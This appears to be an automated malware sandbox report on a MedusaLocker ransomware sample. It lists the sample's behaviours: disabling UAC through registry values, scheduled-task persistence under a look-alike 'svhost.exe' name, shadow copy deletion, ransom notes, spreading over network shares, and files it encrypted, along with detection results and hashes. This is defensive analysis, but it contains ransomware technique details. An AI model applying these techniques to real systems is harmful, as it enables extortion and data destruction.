                        Source: C:\Users\user\Desktop\98j0BL6iLT.exeQueries volume information: C:\ProgramData\Microsoft Help\MS.SETLANG.16.1033.hxn VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\98j0BL6iLT.exeQueries volume information: C:\ProgramData\Microsoft Help\MS.SKYPEFB.16.1033.hxn VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\98j0BL6iLT.exeQueries volume information: C:\ProgramData\Microsoft Help\MS.SKYPEFB_BASIC.16.1033.hxn VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\98j0BL6iLT.exeQueries volume information: C:\ProgramData\Microsoft Help\MS.SKYPEFB_ONLINE.16.1033.hxn VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\98j0BL6iLT.exeQueries volume information: C:\ProgramData\Microsoft Help\MS.SKYPEFB_ONLINEG.16.1033.hxn VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\98j0BL6iLT.exeQueries volume information: C:\ProgramData\Microsoft Help\MS.SPREADSHEETCOMPARE.16.1033.hxn VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\98j0BL6iLT.exeQueries volume information: C:\ProgramData\Microsoft Help\MS.WINWORD.16.1033.hxn VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\98j0BL6iLT.exeQueries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Math Input Panel.lnk VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\98j0BL6iLT.exeQueries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Paint.lnk VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\98j0BL6iLT.exeQueries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Quick Assist.lnk VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Roaming\svhost.exeCode function: EnumSystemLocalesW,1_2_00EB115C
                        Source: C:\Users\user\AppData\Roaming\svhost.exeCode function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,1_2_00EB990B
                        Source: C:\Users\user\AppData\Roaming\svhost.exeCode function: EnumSystemLocalesW,1_2_00EB9297
                        Source: C:\Users\user\AppData\Roaming\svhost.exeCode function: EnumSystemLocalesW,1_2_00EB924C
                        Source: C:\Users\user\AppData\Roaming\svhost.exeCode function: EnumSystemLocalesW,1_2_00EB9332
                        Source: C:\Users\user\AppData\Roaming\svhost.exeCode function: GetLocaleInfoW,1_2_00EB16D5
                        Source: C:\Users\user\AppData\Roaming\svhost.exeCode function: GetACP,IsValidCodePage,_wcschr,_wcschr,GetLocaleInfoW,1_2_00EB8FAA
                        Source: C:\Users\user\AppData\Roaming\svhost.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetACP,1_2_00EB9736
                        Source: C:\Users\user\AppData\Roaming\svhost.exeCode function: 1_2_00E89C2B cpuid 1_2_00E89C2B
                        Source: C:\Users\user\Desktop\98j0BL6iLT.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
                        Source: C:\Users\user\AppData\Roaming\svhost.exeCode function: 1_2_00E772E0 GetSystemTimePreciseAsFileTime,GetSystemTimePreciseAsFileTime,GetSystemTimeAsFileTime,1_2_00E772E0

                        Lowering of HIPS / PFW / Operating System Security Settings

                        barindex
                        Contains functionality to modify Windows User Account Control (UAC) settings
                        Source: C:\Users\user\AppData\Roaming\svhost.exeCode function: RegSetValue: SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\SystemEnableLUASOFTWARE\Microsoft\Windows\CurrentVersion\Policies\SystemConsentPromptBehaviorAdmin1_2_00E70BB0
                        Disables UAC (registry)
                        Source: C:\Users\user\Desktop\98j0BL6iLT.exeRegistry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System EnableLUAJump to behavior

                        Mitre Att&ck Matrix

                        Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
                        1
                        Replication Through Removable Media                        		1
                        Scheduled Task/Job                        		1
                        DLL Side-Loading                        		1
                        DLL Side-Loading                        		2
                        Disable or Modify Tools                        		OS Credential Dumping1
                        System Time Discovery                        		1
                        Taint Shared Content                        		11
                        Archive Collected Data                        		Exfiltration Over Other Network Medium1
                        Ingress Tool Transfer                        		Eavesdrop on Insecure Network CommunicationRemotely Track Device Without Authorization11
                        Data Encrypted for Impact
                        Default Accounts1
                        Service Execution                        		1
                        Windows Service                        		1
                        Bypass User Access Control                        		1
                        Obfuscated Files or Information                        		LSASS Memory11
                        Peripheral Device Discovery                        		1
                        Replication Through Removable Media                        		Data from Removable MediaExfiltration Over Bluetooth21
                        Encrypted Channel                        		Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
                        Domain AccountsAt (Linux)1
                        Scheduled Task/Job                        		1
                        Windows Service                        		1
                        Software Packing                        		Security Account Manager2
                        File and Directory Discovery                        		SMB/Windows Admin SharesData from Network Shared DriveAutomated Exfiltration2
                        Non-Application Layer Protocol                        		Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
                        Local AccountsAt (Windows)1
                        Registry Run Keys / Startup Folder                        		12
                        Process Injection                        		1
                        DLL Side-Loading                        		NTDS34
                        System Information Discovery                        		Distributed Component Object ModelInput CaptureScheduled Transfer13
                        Application Layer Protocol                        		SIM Card SwapCarrier Billing Fraud
                        Cloud AccountsCron1
                        Bootkit                        		1
                        Scheduled Task/Job                        		1
                        Bypass User Access Control                        		LSA Secrets121
                        Security Software Discovery                        		SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
                        Replication Through Removable MediaLaunchdRc.common1
                        Registry Run Keys / Startup Folder                        		1
                        File Deletion                        		Cached Domain Credentials3
                        Process Discovery                        		VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
                        External Remote ServicesScheduled TaskStartup ItemsStartup Items1
                        Masquerading                        		DCSync1
                        System Network Configuration Discovery                        		Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
                        Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/Job12
                        Process Injection                        		Proc FilesystemNetwork Service ScanningShared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue
                        Exploit Public-Facing ApplicationPowerShellAt (Linux)At (Linux)1
                        Bootkit                        		/etc/passwd and /etc/shadowSystem Network Connections DiscoverySoftware Deployment ToolsData StagedExfiltration Over Asymmetric Encrypted Non-C2 ProtocolWeb ProtocolsRogue Cellular Base StationData Destruction

                        Behavior Graph

                        Hide Legend

                        Legend:

                        • Process
                        • Signature
                        • Created File
                        • DNS/IP Info
                        • Is Dropped
                        • Is Windows Process
                        • Number of created Registry Values
                        • Number of created Files
                        • Visual Basic
                        • Delphi
                        • Java
                        • .Net C# or VB.NET
                        • C, C++ or other language
                        • Is malicious
                        • Internet
                        behaviorgraph top1 signatures2 2 Behavior Graph ID: 791695 Sample: 98j0BL6iLT.exe Startdate: 25/01/2023 Architecture: WINDOWS Score: 100 48 Malicious sample detected (through community Yara rule) 2->48 50 Antivirus / Scanner detection for submitted sample 2->50 52 Multi AV Scanner detection for submitted file 2->52 54 9 other signatures 2->54 7 98j0BL6iLT.exe 503 101 2->7         started        12 svhost.exe 2->12         started        process3 dnsIp4 42 192.168.2.1, 274 unknown unknown 7->42 44 192.168.2.10 unknown unknown 7->44 46 98 other IPs or domains 7->46 34 Z:\Recovery\...\Winre.wim.onelock (copy), DOS 7->34 dropped 36 C:\Users\user\AppData\Roaming\svhost.exe, PE32 7->36 dropped 38 C:\Recovery\WindowsRE\Winre.wim, DOS 7->38 dropped 40 49 other malicious files 7->40 dropped 56 Deletes shadow drive data (may be related to ransomware) 7->56 58 Writes a notice file (html or txt) to demand a ransom 7->58 60 Spreads via windows shares (copies files to share folders) 7->60 68 2 other signatures 7->68 14 WMIC.exe 1 7->14         started        16 WMIC.exe 1 7->16         started        18 WMIC.exe 1 7->18         started        20 3 other processes 7->20 62 Antivirus detection for dropped file 12->62 64 Multi AV Scanner detection for dropped file 12->64 66 Contains functionality to bypass UAC (CMSTPLUA) 12->66 70 2 other signatures 12->70 file5 signatures6 process7 process8 22 conhost.exe 14->22         started        24 conhost.exe 16->24         started        26 conhost.exe 18->26         started        28 conhost.exe 20->28         started        30 conhost.exe 20->30         started        32 conhost.exe 20->32         started       

                        Screenshots

                        Thumbnails

                        This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                        windows-stand

                        Antivirus, Machine Learning and Genetic Malware Detection

                        Initial Sample

                        SourceDetectionScannerLabelLink
                        98j0BL6iLT.exe90%ReversingLabsWin32.Ransomware.MedusaLocker
                        98j0BL6iLT.exe74%VirustotalBrowse
                        98j0BL6iLT.exe100%AviraHEUR/AGEN.1213242
                        98j0BL6iLT.exe100%Joe Sandbox ML

                        Dropped Files

                        SourceDetectionScannerLabelLink
                        C:\Users\user\AppData\Roaming\svhost.exe100%AviraHEUR/AGEN.1213242
                        C:\Users\user\AppData\Roaming\svhost.exe100%Joe Sandbox ML
                        C:\Users\user\AppData\Roaming\svhost.exe90%ReversingLabsWin32.Ransomware.MedusaLocker

                        Unpacked PE Files

                        SourceDetectionScannerLabelLinkDownload
                        0.3.98j0BL6iLT.exe.3415240.6.unpack100%AviraTR/Patched.Ren.GenDownload File
                        0.3.98j0BL6iLT.exe.3277c40.15.unpack100%AviraTR/Patched.Ren.GenDownload File
                        1.0.svhost.exe.e50000.0.unpack100%AviraHEUR/AGEN.1213242Download File
                        0.3.98j0BL6iLT.exe.3456c40.4.unpack100%AviraTR/Patched.Ren.GenDownload File
                        0.0.98j0BL6iLT.exe.9d0000.0.unpack100%AviraHEUR/AGEN.1213242Download File
                        1.2.svhost.exe.e50000.0.unpack100%AviraHEUR/AGEN.1213242Download File

                        Domains

                        No Antivirus matches

                        URLs

                        SourceDetectionScannerLabelLink
                        http://www.flexerasoftware.com00%URL Reputationsafe
                        http://ocsp.thawte.com00%URL Reputationsafe
                        http://dmd-ca-beta2/CertEnroll/Microsoft%20Digital%20Media%20Authority%202005.crl0%Avira URL Cloudsafe
                        http://dmd-ca-beta2/CertEnroll/dmd-ca-beta2_Microsoft%20Digital%20Media%20Authority%202005.crt0d0%Avira URL Cloudsafe

                        Domains and IPs

                        Contacted Domains

                        No contacted domains info

                        URLs from Memory and Binaries

                        NameSourceMaliciousAntivirus DetectionReputation
                        http://www.symauth.com/rpa0498j0BL6iLT.exe, 00000000.00000003.355459470.000000000329E000.00000004.00000020.00020000.00000000.sdmp, 98j0BL6iLT.exe, 00000000.00000003.347755634.0000000003387000.00000004.00000020.00020000.00000000.sdmp, 98j0BL6iLT.exe, 00000000.00000003.347755634.0000000003239000.00000004.00000020.00020000.00000000.sdmp, 98j0BL6iLT.exe, 00000000.00000003.347755634.00000000032C1000.00000004.00000020.00020000.00000000.sdmp, 98j0BL6iLT.exe, 00000000.00000003.347755634.00000000034B7000.00000004.00000020.00020000.00000000.sdmp, 98j0BL6iLT.exe, 00000000.00000003.355459470.0000000003396000.00000004.00000020.00020000.00000000.sdmpfalse
                          		high
                          http://crl.thawte.com/ThawteTimestampingCA.crl098j0BL6iLT.exe, 00000000.00000003.355459470.000000000329E000.00000004.00000020.00020000.00000000.sdmp, 98j0BL6iLT.exe, 00000000.00000003.347755634.0000000003387000.00000004.00000020.00020000.00000000.sdmp, 98j0BL6iLT.exe, 00000000.00000003.347755634.0000000003239000.00000004.00000020.00020000.00000000.sdmp, 98j0BL6iLT.exe, 00000000.00000003.347755634.00000000032C1000.00000004.00000020.00020000.00000000.sdmp, 98j0BL6iLT.exe, 00000000.00000003.347755634.00000000034B7000.00000004.00000020.00020000.00000000.sdmp, 98j0BL6iLT.exe, 00000000.00000003.355459470.0000000003396000.00000004.00000020.00020000.00000000.sdmpfalse
                            		high
                            http://www.symauth.com/cps0998j0BL6iLT.exe, 00000000.00000003.355459470.000000000329E000.00000004.00000020.00020000.00000000.sdmp, 98j0BL6iLT.exe, 00000000.00000003.347755634.0000000003387000.00000004.00000020.00020000.00000000.sdmp, 98j0BL6iLT.exe, 00000000.00000003.347755634.0000000003239000.00000004.00000020.00020000.00000000.sdmp, 98j0BL6iLT.exe, 00000000.00000003.347755634.00000000032C1000.00000004.00000020.00020000.00000000.sdmp, 98j0BL6iLT.exe, 00000000.00000003.347755634.00000000034B7000.00000004.00000020.00020000.00000000.sdmp, 98j0BL6iLT.exe, 00000000.00000003.355459470.0000000003396000.00000004.00000020.00020000.00000000.sdmpfalse
                              		high
                              http://www.flexerasoftware.com098j0BL6iLT.exe, 00000000.00000003.347755634.0000000003387000.00000004.00000020.00020000.00000000.sdmpfalse
                              • URL Reputation: safe
                              		unknown
                              http://www.symauth.com/cps0(98j0BL6iLT.exe, 00000000.00000003.355459470.000000000329E000.00000004.00000020.00020000.00000000.sdmp, 98j0BL6iLT.exe, 00000000.00000003.347755634.0000000003387000.00000004.00000020.00020000.00000000.sdmp, 98j0BL6iLT.exe, 00000000.00000003.347755634.0000000003239000.00000004.00000020.00020000.00000000.sdmp, 98j0BL6iLT.exe, 00000000.00000003.347755634.00000000032C1000.00000004.00000020.00020000.00000000.sdmp, 98j0BL6iLT.exe, 00000000.00000003.347755634.00000000034B7000.00000004.00000020.00020000.00000000.sdmp, 98j0BL6iLT.exe, 00000000.00000003.355459470.0000000003396000.00000004.00000020.00020000.00000000.sdmpfalse
                                		high
                                http://dmd-ca-beta2/CertEnroll/dmd-ca-beta2_Microsoft%20Digital%20Media%20Authority%202005.crt0d98j0BL6iLT.exe, 00000000.00000003.420822378.000000000323B000.00000004.00000020.00020000.00000000.sdmpfalse
                                • Avira URL Cloud: safe
                                		low
                                http://dmd-ca-beta2/CertEnroll/Microsoft%20Digital%20Media%20Authority%202005.crl98j0BL6iLT.exe, 00000000.00000003.420822378.000000000323B000.00000004.00000020.00020000.00000000.sdmpfalse
                                • Avira URL Cloud: safe
                                		low
                                http://ocsp.thawte.com098j0BL6iLT.exe, 00000000.00000003.355459470.000000000329E000.00000004.00000020.00020000.00000000.sdmp, 98j0BL6iLT.exe, 00000000.00000003.347755634.0000000003387000.00000004.00000020.00020000.00000000.sdmp, 98j0BL6iLT.exe, 00000000.00000003.347755634.0000000003239000.00000004.00000020.00020000.00000000.sdmp, 98j0BL6iLT.exe, 00000000.00000003.347755634.00000000032C1000.00000004.00000020.00020000.00000000.sdmp, 98j0BL6iLT.exe, 00000000.00000003.347755634.00000000034B7000.00000004.00000020.00020000.00000000.sdmp, 98j0BL6iLT.exe, 00000000.00000003.355459470.0000000003396000.00000004.00000020.00020000.00000000.sdmpfalse
                                • URL Reputation: safe
                                		unknown
                                https://protonmail.com98j0BL6iLT.exe, how_to_back_files.html4.0.dr, how_to_back_files.html6.0.dr, how_to_back_files.html1.0.dr, how_to_back_files.html7.0.drfalse
                                  		high
                                  https://www.torproject.org98j0BL6iLT.exe, how_to_back_files.html4.0.dr, how_to_back_files.html6.0.dr, how_to_back_files.html1.0.dr, how_to_back_files.html7.0.drfalse
                                    		high

                                    World Map of Contacted IPs

                                    • No. of IPs < 25%
                                    • 25% < No. of IPs < 50%
                                    • 50% < No. of IPs < 75%
                                    • 75% < No. of IPs

                                    Public IPs

                                    IPDomainCountryFlagASNASN NameMalicious

                                    Private

                                    IP
                                    192.168.2.39
                                    192.168.2.38
                                    192.168.2.42
                                    192.168.2.148
                                    192.168.2.41
                                    192.168.2.149
                                    192.168.2.44
                                    192.168.2.146
                                    192.168.2.43
                                    192.168.2.147
                                    192.168.2.46
                                    192.168.2.45
                                    192.168.2.48
                                    192.168.2.47
                                    192.168.2.140
                                    192.168.2.141
                                    192.168.2.144
                                    192.168.2.145
                                    192.168.2.40
                                    192.168.2.142
                                    192.168.2.143
                                    192.168.2.28
                                    192.168.2.27
                                    192.168.2.29
                                    192.168.2.31
                                    192.168.2.159
                                    192.168.2.30
                                    192.168.2.33
                                    192.168.2.157
                                    192.168.2.32
                                    192.168.2.158
                                    192.168.2.35
                                    192.168.2.34
                                    192.168.2.37
                                    192.168.2.36
                                    192.168.2.151
                                    192.168.2.152
                                    192.168.2.150
                                    192.168.2.155
                                    192.168.2.156
                                    192.168.2.153
                                    192.168.2.154
                                    192.168.2.17
                                    192.168.2.16
                                    192.168.2.19
                                    192.168.2.18
                                    192.168.2.20
                                    192.168.2.126
                                    192.168.2.127
                                    192.168.2.22
                                    192.168.2.124
                                    192.168.2.21
                                    192.168.2.125
                                    192.168.2.24
                                    192.168.2.23
                                    192.168.2.26
                                    192.168.2.128
                                    192.168.2.25
                                    192.168.2.129
                                    192.168.2.122
                                    192.168.2.123
                                    192.168.2.120
                                    192.168.2.121
                                    192.168.2.97
                                    192.168.2.137
                                    192.168.2.96
                                    192.168.2.138
                                    192.168.2.11
                                    192.168.2.99
                                    192.168.2.135
                                    192.168.2.10
                                    192.168.2.98
                                    192.168.2.136
                                    192.168.2.13
                                    192.168.2.12
                                    192.168.2.15
                                    192.168.2.139
                                    192.168.2.14
                                    192.168.2.130
                                    192.168.2.91
                                    192.168.2.90
                                    192.168.2.93
                                    192.168.2.133
                                    192.168.2.92
                                    192.168.2.134
                                    192.168.2.95
                                    192.168.2.131
                                    192.168.2.94
                                    192.168.2.132
                                    192.168.2.2
                                    192.168.2.1
                                    192.168.2.180
                                    192.168.2.181
                                    192.168.2.8
                                    192.168.2.7
                                    192.168.2.9
                                    192.168.2.4
                                    192.168.2.3
                                    192.168.2.6
                                    192.168.2.5

                                    General Information

                                    Joe Sandbox Version:36.0.0 Rainbow Opal
                                    Analysis ID:791695
                                    Start date and time:2023-01-25 19:44:10 +01:00
                                    Joe Sandbox Product:CloudBasic
                                    Overall analysis duration:0h 9m 13s
                                    Hypervisor based Inspection enabled:false
                                    Report type:full
                                    Sample file name:98j0BL6iLT.exe
                                    Cookbook file name:default.jbs
                                    Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 104, IE 11, Adobe Reader DC 19, Java 8 Update 211
                                    Number of analysed new started processes analysed:29
                                    Number of new started drivers analysed:0
                                    Number of existing processes analysed:0
                                    Number of existing drivers analysed:0
                                    Number of injected processes analysed:0
                                    Technologies:
                                    • HCA enabled
                                    • EGA enabled
                                    • HDC enabled
                                    • AMSI enabled
                                    Analysis Mode:default
                                    Analysis stop reason:Timeout
                                    Detection:MAL
                                    Classification:mal100.rans.spre.expl.evad.winEXE@20/71@0/100
                                    EGA Information:
                                    • Successful, ratio: 100%
                                    HDC Information:
                                    • Successful, ratio: 100% (good quality ratio 96.6%)
                                    • Quality average: 77.6%
                                    • Quality standard deviation: 23.9%
                                    HCA Information:Failed
                                    Cookbook Comments:
                                    • Found application associated with file extension: .exe

                                    Warnings

                                    • Exclude process from analysis (whitelisted): MpCmdRun.exe, audiodg.exe, backgroundTaskHost.exe, SgrmBroker.exe, conhost.exe, VSSVC.exe, svchost.exe
                                    • Excluded domains from analysis (whitelisted): fs.microsoft.com
                                    • Not all processes where analyzed, report is missing behavior information
                                    • Report size exceeded maximum capacity and may have missing behavior information.
                                    • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                    • Report size getting too big, too many NtCreateFile calls found.
                                    • Report size getting too big, too many NtOpenFile calls found.
                                    • Report size getting too big, too many NtOpenKeyEx calls found.
                                    • Report size getting too big, too many NtQueryAttributesFile calls found.
                                    • Report size getting too big, too many NtQueryValueKey calls found.
                                    • Report size getting too big, too many NtQueryVolumeInformationFile calls found.
                                    • Report size getting too big, too many NtSetInformationFile calls found.
                                    • Report size getting too big, too many NtSetValueKey calls found.
                                    • Report size getting too big, too many NtWriteFile calls found.

                                    Simulations

                                    Behavior and APIs

                                    TimeTypeDescription
                                    19:45:06Task SchedulerRun new task: svhost path: C:\Users\user\AppData\Roaming\svhost.exe
                                    19:45:10API Interceptor3x Sleep call for process: WMIC.exe modified

                                    Joe Sandbox View / Context

                                    IPs

                                    No context

                                    Domains

                                    No context

                                    ASNs

                                    No context

                                    JA3 Fingerprints

                                    MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                    bd0bf25947d4a37404f0424edf4db9adLibreOffice-release.exeGet hashmaliciousBrowse
                                    • 23.35.236.109
                                    1VEzy2G1cn.exeGet hashmaliciousBrowse
                                    • 23.35.236.109
                                    rUxaE9Uro6.exeGet hashmaliciousBrowse
                                    • 23.35.236.109
                                    pbCVrK8Qfb.exeGet hashmaliciousBrowse
                                    • 23.35.236.109
                                    6qBV1gtL5J.exeGet hashmaliciousBrowse
                                    • 23.35.236.109
                                    cryptor.exeGet hashmaliciousBrowse
                                    • 23.35.236.109
                                    SecuriteInfo.com.Win64.CrypterX-gen.381.20116.exeGet hashmaliciousBrowse
                                    • 23.35.236.109
                                    ABJ.batGet hashmaliciousBrowse
                                    • 23.35.236.109
                                    iWinGamesManager.exeGet hashmaliciousBrowse
                                    • 23.35.236.109
                                    cryptor.exeGet hashmaliciousBrowse
                                    • 23.35.236.109
                                    cryptor.bin.exeGet hashmaliciousBrowse
                                    • 23.35.236.109
                                    ZjtQjQa9Bj.dllGet hashmaliciousBrowse
                                    • 23.35.236.109
                                    Contracts0001.exeGet hashmaliciousBrowse
                                    • 23.35.236.109
                                    I9sNE4Qudl.exeGet hashmaliciousBrowse
                                    • 23.35.236.109
                                    file.exeGet hashmaliciousBrowse
                                    • 23.35.236.109
                                    file.exeGet hashmaliciousBrowse
                                    • 23.35.236.109
                                    file.exeGet hashmaliciousBrowse
                                    • 23.35.236.109
                                    file.exeGet hashmaliciousBrowse
                                    • 23.35.236.109
                                    file.exeGet hashmaliciousBrowse
                                    • 23.35.236.109
                                    file.exeGet hashmaliciousBrowse
                                    • 23.35.236.109

                                    Dropped Files

                                    No context

                                    Created / dropped Files

                                    C:\$RECYCLE.BIN\S-1-5-21-3853321935-2125563209-4053062332-1002\desktop.ini

                                    Download File
                                    Process:C:\Users\user\Desktop\98j0BL6iLT.exe
                                    File Type:Windows desktop.ini
                                    Category:dropped
                                    Size (bytes):129
                                    Entropy (8bit):5.323600488446077
                                    Encrypted:false
                                    SSDEEP:3:0NdQDjoqxyRVIQBU+1IVLfAPmBACaWZcy/FbBmedyn:0NwoSyzI2U8MAPVCawbBmeUn
                                    MD5:A526B9E7C716B3489D8CC062FBCE4005
                                    SHA1:2DF502A944FF721241BE20A9E449D2ACD07E0312
                                    SHA-256:E1B9CE9B57957B1A0607A72A057D6B7A9B34EA60F3F8AA8F38A3AF979BD23066
                                    SHA-512:D83D4C656C96C3D1809AD06CE78FA09A77781461C99109E4B81D1A186FC533A7E72D65A4CB7EDF689EECCDA8F687A13D3276F1111A1E72F7C3CD92A49BCE0F88
                                    Malicious:false
                                    Preview:[.ShellClassInfo]..CLSID={645FF040-5081-101B-9F08-00AA002F954E}..LocalizedResourceName=@%SystemRoot%\system32\shell32.dll,-8964..

                                    C:\$RECYCLE.BIN\desktop.ini

                                    Download File
                                    Process:C:\Users\user\Desktop\98j0BL6iLT.exe
                                    File Type:Windows desktop.ini
                                    Category:dropped
                                    Size (bytes):129
                                    Entropy (8bit):5.323600488446077
                                    Encrypted:false
                                    SSDEEP:3:0NdQDjoqxyRVIQBU+1IVLfAPmBACaWZcy/FbBmedyn:0NwoSyzI2U8MAPVCawbBmeUn
                                    MD5:A526B9E7C716B3489D8CC062FBCE4005
                                    SHA1:2DF502A944FF721241BE20A9E449D2ACD07E0312
                                    SHA-256:E1B9CE9B57957B1A0607A72A057D6B7A9B34EA60F3F8AA8F38A3AF979BD23066
                                    SHA-512:D83D4C656C96C3D1809AD06CE78FA09A77781461C99109E4B81D1A186FC533A7E72D65A4CB7EDF689EECCDA8F687A13D3276F1111A1E72F7C3CD92A49BCE0F88
                                    Malicious:false
                                    Preview:[.ShellClassInfo]..CLSID={645FF040-5081-101B-9F08-00AA002F954E}..LocalizedResourceName=@%SystemRoot%\system32\shell32.dll,-8964..

                                    C:\Documents and Settings\All Users\Adobe\ARM\S\436\AdobeARM.msi.onelock (copy)

                                    Download File
                                    Process:C:\Users\user\Desktop\98j0BL6iLT.exe
                                    File Type:data
                                    Category:dropped
                                    Size (bytes):991768
                                    Entropy (8bit):7.9998129773584585
                                    Encrypted:true
                                    SSDEEP:24576:uX5m4G1rn8Lxf+qgv16g76I2ViwcquUtdB8ZXIt9oM4vWA/RNwhtA:uJi1rnsAzkwgiwcM+cSlvZ/aW
                                    MD5:DC2B924DFC42C115EB70B13483F60EBC
                                    SHA1:602228E32E3EF8ABFA9DB0DC1F8B8E5E0D5EA1EF
                                    SHA-256:25BF6ED8484F044C1D1D3DD641B58448A9B14A8296863895D83F186A449FB094
                                    SHA-512:C7F666BA5AFCC050861B9A412FA5DD131B6D10603C04F9F9ED9C74392AB75AD347CAD1E640820587EA8EAC697500B31C78880915207B2AA2807BAE8EB130F2A6
                                    Malicious:true
                                    Preview:>|.6......=.......V....W..\{..]....Q..l.....O.......h.....x.F..~]...L.l.....~.O.M......'...l............9h....C...F./qj..v.c.......1....K...J%.e...! qOCY.....6l.....u4....l....]g.._..cA.q.3...S.(.L....CN.@...v..|b..-5dZ_g.(..5.0.(K.s}RX.A.......j..l...i..hf........5...4B QDO....f.D......Bd......Q....."/-.....5#*1.....s....'._.........|...oL......w}|..>VN.P.&a.o<.:..cS{..R.x........'[.P....:...+...............#G.a...{...=.....`.kI.\...._.O.Xk.X....H&.e....)....M....~......j...+...).I.y..3...W^......3.j..=......w.L...p..~a...!.Z...{...f//..K;.....y..,...y"..|.@p1....xS]......$.Mx.e.ea..v:[@|....X..f....|.!..A.*..*.;....WB1........[.{<..E^.s...:........*..BM..O.^;B....|...7...63.zb...`.....}.H.^...K..a..u...L}8.....V.(c.......D...$.e...s.;f..b.$.3K:..!.0'7..*. .U....s.|. ....pi.q.8.eAB..~.rI....]..c..l[..w..F.v..G..e1...yv..`/....)S.5..J,..M/.H.H..}......2..*w...d.B6DJ..A....u...(.b$5QC{.@..I..HJ.GC..[....!..ncD.u8.A.~...(.?_.".a

                                    C:\Documents and Settings\All Users\Adobe\ARM\{291AA914-A987-4CE9-BD63-AC0A92D435E5}\RdrManifest3.msi.onelock (copy)

                                    Download File
                                    Process:C:\Users\user\Desktop\98j0BL6iLT.exe
                                    File Type:data
                                    Category:dropped
                                    Size (bytes):16920
                                    Entropy (8bit):7.988589241739158
                                    Encrypted:false
                                    SSDEEP:384:12XWbvM2KjMYgIpTdZ/i9uB002Qyl1HpDwJqWgbWCHoc8VsJ2I/BY:1GOvM2bYgiTd1iEHyF0JqWgbWCIc8Vsy
                                    MD5:BBE2F027562F3D8783AD89517CA24D5F
                                    SHA1:C6ACEEBB743B2C442804EC108BC7245A09C347F1
                                    SHA-256:4019B9B7FD1D3F9A06BE7466D5D13122942FBAAA30094BC4D93A96B6EB05CFD8
                                    SHA-512:F10C5822448080421BBC897F081665F070FE975B45298EBF7A95861B6D255F90356431B2E6DB20AFF9EAD0CB4416970193C2C3224026FDFD5162DD9112CB6928
                                    Malicious:false
                                    Preview:>|.6......=.......V....W..\{..].\....e\:9sr.X..uH......a...,.....`'umh..@iRS]./..7....r..m..`.(J.-.4.=r... ...t.=.`|'.P.-...w...|{...:...t,...w.!..5..y..H.]PN.'...cfi...!.a..1....W.X....V......7...b.S............. .....N;"....TT...i....L"...e..t...u..d...&MHyX.....av./..k.]......../...\...!\.Nj..BwA....~.,.|....E....~%.G7).q...#..+.L.u7.Q.[..o.....P...PQ....b..<}c.%.....2e..t.j.> ..t.....x1..B.>2..V..s..L....m..........d...E.@2q.{.v-*.i....r.P....vc*.0....iV....:Qx(.,.......n.....Eh.Q.^M.*...'..0...........l.aKf.Ha..K..)...>.....$s.r..F_(.o..d.d!{..b(.....q..4...l...,.Vx..Un......Jh...}/.}.C.Hh}4..nh.l.J.'..........z..a...&8.Fo..+X/...Xi...u ....K....-.......}d?T7W~.\.",...m.....VA...K.5'Qz#%..=b....C.z..Zu...W.GS$.7.;w.T.Z..Ew....2...!w..,f...:.|h.#V.kb.j=.ty...Px.)..}...K:].}Z;..o:$QJ......8 .v{.^?!.q.k.lc.X...))...Yk. lU .%!....{....{..>qL..8..#....n'..p...^..%G..%.#@u(Y.....m..w..k^...#c0Q.qDT....|@...d....I(@.{...1.|........-7C.

                                    C:\Documents and Settings\All Users\Adobe\Setup\{AC76BA86-7AD7-1033-7B44-AC0F074E4100}\AcroRdrDCUpd1901220034.msp.onelock (copy)

                                    Download File
                                    Process:C:\Users\user\Desktop\98j0BL6iLT.exe
                                    File Type:data
                                    Category:dropped
                                    Size (bytes):244417048
                                    Entropy (8bit):6.919251884180285
                                    Encrypted:false
                                    SSDEEP:6291456:4hpELQzJo3S/buKi8FpgpeNcOf77ntTVU5EAb2XO9oo:+pELQzWKi8FpgpeNcOf77ntTVU5EAb20
                                    MD5:691663F587683CDDDE61CDF8B5EC6404
                                    SHA1:C520C74D6B599D1A9FD656D87C1657F4F6079ABB
                                    SHA-256:4751B85861F5F619F7D7080483CD261776ED7011B69F8C1E65015F419DF707C6
                                    SHA-512:AE6D4C0CB687052CA666BA0B123A0B156C8AC01BCD897E6F9A92841A9D8CFEAA3274F1836E262C4EB6E3E0C3E51463DB899F97173E246175FD562D8F24E44200
                                    Malicious:false
